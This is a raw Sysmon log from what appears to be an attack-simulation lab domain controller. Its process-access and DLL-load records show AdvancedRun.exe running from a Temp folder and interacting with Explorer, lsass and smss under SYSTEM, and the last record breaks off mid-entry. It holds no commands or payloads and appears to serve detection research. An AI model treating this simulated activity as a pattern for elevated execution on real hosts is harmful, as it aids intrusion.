10341000x80000000000000004079704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004079703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.523{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.522{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.522{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.521{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.516{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.516{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.512{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004079678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.286{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.283{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.146{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.144{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.143{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.143{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004079671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.141{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004079670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.136{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004079668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.133{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004079663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 